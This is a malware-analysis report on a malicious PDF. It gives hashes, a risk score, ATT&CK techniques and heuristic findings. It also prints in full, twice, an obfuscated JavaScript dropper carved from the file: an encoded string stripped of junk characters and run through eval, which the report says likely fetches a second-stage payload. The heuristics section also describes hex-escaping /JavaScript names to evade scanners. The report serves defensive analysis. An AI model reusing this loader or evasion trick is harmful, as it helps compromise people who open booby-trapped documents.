PDF malware analysis — malicious · 728dc16b0b0cbe6c

MALICIOUS

PDF

7.3 KB Authoring application: Tooqimeqipigafara (via ee7f7Renizaxizo)

MD5: 0d40debb5b5bbe26d6e28412fc0645fd SHA-1: c7a2019d8f3f3a9e2b01a3b8af275be7da1e3074 SHA-256: 728dc16b0b0cbe6ce59c5c30ffbfdbc8484f66a54fd99dc49b9eeb7975039c29

106 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_OBFUSCATED_NAME_OBJECT. The ML classifier also flagged it as malicious with high confidence. The embedded JavaScript is likely responsible for downloading and executing a second-stage payload, a common technique for initial compromise.

Machine Learning

Nyx PDF Classifier malicious score 0.9991

Heuristics 3

Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECT

A PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0010_000.js
b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4 pdf-javascript-stream PDF /JS object 10 at offset 0x130D 2214 bytes

Filename	Kind	Source	Size
`javascript_obj0010_000.js` `b53e27bbdeba8c818850cc3826b3d643c06114ca0ccd161a827d53f8e26598c4`	pdf-javascript-stream	PDF /JS object 10 at offset 0x130D	2214 bytes
Preview script First 1,000 lines of the extracted script var mXMB = null;try {var tIR=0;function x(hSL){this.tEP=hSL;};var jOZ="va!r% #skX8GkX$=!t$h$i~sk.9t#E\|P>;\|r#=$\'kg!e9t$PUa$g!e#N$\'\|;9b#QkZ\|=%r$+\|\'\|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d\|s\|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 \|285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'\|\'U;$t\|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=\|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V\|=~\'!l%ekn!g8t$h\|\'#;&z~G~L>S8=$\'%\\\|\\$x%\'~;%l\|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a\|rks~e$I\|n>t8\'\|;&t9C9P\|=!\'\|f%r\|o9m&C8h#a8r$Cko!dUe~\'~;~b9M\|Z#=k\'~ckhUa\|rkC#o9d#e$A#t8\'9;%q\|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'\|d\|o\|c~\'9;&v9I$X!=#3&3!2\|;%x&G#Fk=k[#]U;\|bkM8Xk=\|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=\|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X\|[\|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V\|=~t9I9R\|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G\|V~,&t&r#u%e%)%;~j~OUB>=\|[\|j&O>B$,UbkS\|N!]>[#x%I>D%]\|(!rUQkH!)~;&;9}$f\|o&r~(%j!GkV&=%08;Uj#G!V! \|<> ~j\|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{\|s9T\|C&L!=!j~O#B%[\|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r&E~F>=8p\|a9r%s!e~I\|n8t~(8s!T$C&L9,8f>G9L#)9;kf$I>H\|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr\|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W\|RU[\|x%M$V9]%=9=#q!F>M\|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W\|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R\|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 8S#t8r!iUn9g\|($z%GUL~S# >+$ 8x9G\|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X\|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;\|s\|XkG$XU.>x#Y%N!=U(>b9M9X8[\|z>A$T>]!(~b\|M\|X>[!x>MUVk]8-~v\|I#X$)9)%;\|sUX!G%X\|.$h8SUD\|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(\|)#;!}# %c8a!t!cUh8(>n&M~H$)~{\|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ \|{~a9p!p\|[%n#A%B~]\|(ks%X>G&X&.\|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;var v=this;var qFMN=2-1;var lSP=/[\>8%U&#\$~\\|\!k9]/g;function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}var tGB=new String("Fun"+"cti"+"on");var xMV="len"+"gth";;jOZ=jOZ.replace(lSP, '');nAB=zAL(String("lav"+"e"));nEX=zAL("epyt"+"otor"+"p");;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};var mXMB=new x(v);mXMB.fOF(tIR);} catch(bMX){}

Preview script

First 1,000 lines of the extracted script

var mXMB = null;try {var tIR=0;function x(hSL){this.tEP=hSL;};var jOZ="va!r% #skX8GkX$=!t$h$i~sk.9t#E|P>;|r#=$\'kg!e9t$PUa$g!e#N$\'|;9b#QkZ|=%r$+|\'|t#h>Wko~r~d!\'~;&t>I~P8=!r&+9\'>u8m9W!okr8d|s|\'%;8r>OkV#=9\'Up#a$g!e&N~u#m!\'$;$j8W%L& >=9 |285k0% >;%r8QUHU=U\'&\'>;8x$IkD!=U\'!j~o%ikn>\'$;>j9O#B!=9\'|\'U;$t|IUR$=~0%;Up&Q#J$=US!t8r$i%nkg$;8z!A8T&=|\'$s$u9b#skt~r9\'U;>n~A#B9=$\'ke%v!a&l>\'8;#x>M$V|=~\'!l%ekn!g8t$h|\'#;&z~G~L>S8=$\'%\\|\\$x%\'~;%l|I8ZU=#\'&t>o>S8t#rUi$n%g>\'9;kf&MUB&=>\'~p$a|rks~e$I|n>t8\'|;&t9C9P|=!\'|f%r|o9m&C8h#a8r$Cko!dUe~\'~;~b9M|Z#=k\'~ckhUa|rkC#o9d#e$A#t8\'9;%q|F$M>N$=>4U/&4!;$b&W~Zk=&1!+&4!;>v9AkP&=>2!0$0k+#5!5&;&vU=#\'|d|o|c~\'9;&v9I$X!=#3&3!2|;%x&G#Fk=k[#]U;|bkM8Xk=|\'%\'9;~f&G9L~=!1>6!;~r&K&Lk=|2k;$xUE8V%C#=k4k;!d$Q$B%=8s~X!G%X|[|tUI$Pk]!(!s#XUG!X~[&rUO!V>]>)#;>f9o9r#(%jUG8V|=~t9I9R|;~jUG&V~<> kd#Q$B$;$ Uj%G~V#+~+k)k{>v8a#r8 9b>S#Nk=$s$X8G!X#[$b%QkZ>]8(~s~X~G8X~[#r!O8V%]8,kj!G|V~,&t&r#u%e%)%;~j~OUB>=|[|j&O>B$,UbkS|N!]>[#x%I>D%]|(!rUQkH!)~;&;9}$f|o&r~(%j!GkV&=%08;Uj#G!V! |<> ~j|O8B>[~xUM9V%]9;U Uj&GUVU+>=&r&K~L&)%{|s9T|C&L!=!j~O#B%[|z&AUT&]k(9j~G8Vk,%r$K8L!)k;&r&E~F>=8p|a9r%s!e~I|n8t~(8s!T$C&L9,8f>G9L#)9;kf$I>H|=9r8EkF>^%jkWkL!;&r8W%R8=>f#I9H#.$t%o>S8tkr|i!n$g&(%f&G%L%)!;kr>W&R%=~(#r#W|RU[|x%M$V9]%=9=#q!F>M|N~)U !?9 k\'$0&\'! #+! !r>W#R& #:$ ~r%W|R$;Ux9G!Fk.!p!u$sUh%(%r8W!R|)~;~}$t%r~y! %{9b$M#X&=9n#e~w! 8S#t8r!iUn9g|($z%GUL~S# >+$ 8x9G|F![!x#I$D~]8($z#G>L!S#)~)!;ka~pUpk[~n!A$B%]!(8\'8b&M$X|=>\"9\'&+~b8M%X&+%\'9\"U;~\'9)U;|s|XkG$XU.>x#Y%N!=U(>b9M9X8[|z>A$T>]!(~b|M|X>[!x>MUVk]8-~v|I#X$)9)%;|sUX!G%X|.$h8SUD|=>(8bkM~X8[UzkA%T>]#(8t8I9R&,&b$M$X![9x~M9V>]9->v8I9X&)%)~;!bkYUZ9(|)#;!}# %c8a!t!cUh8(>n&M~H$)~{|ikf>(%s%X$G$X%.8h9S#D#)U{>t8r$y~ |{~a9p!p|[%n#A%B~]|(ks%X>G&X&.|h$S!D%)%;9}~ kcka%t%ckh$(>n$M#H9)9{$}!}U kekl#s&e> %{$}~}>";var jGL=11+44;var v=this;var qFMN=2-1;var lSP=/[\>8%U&#\$~\|\!k9]/g;function zAL(pUD){nKB='';for(jGV=pUD.length;jGV >=0;jGV--)nKB+=pUD.charAt(jGV);return nKB;}var tGB=new String("Fun"+"cti"+"on");var xMV="len"+"gth";;jOZ=jOZ.replace(lSP, '');nAB=zAL(String("lav"+"e"));nEX=zAL("epyt"+"otor"+"p");;x[nEX]={fOF : function(jQT){if(jQT > jGL){this.tEP[nAB](jOZ);} else {mXMB.fOF(jQT+qFMN);}},};var mXMB=new x(v);mXMB.fOF(tIR);} catch(bMX){}

Open this report in the interactive analyzer, or submit your own file for analysis.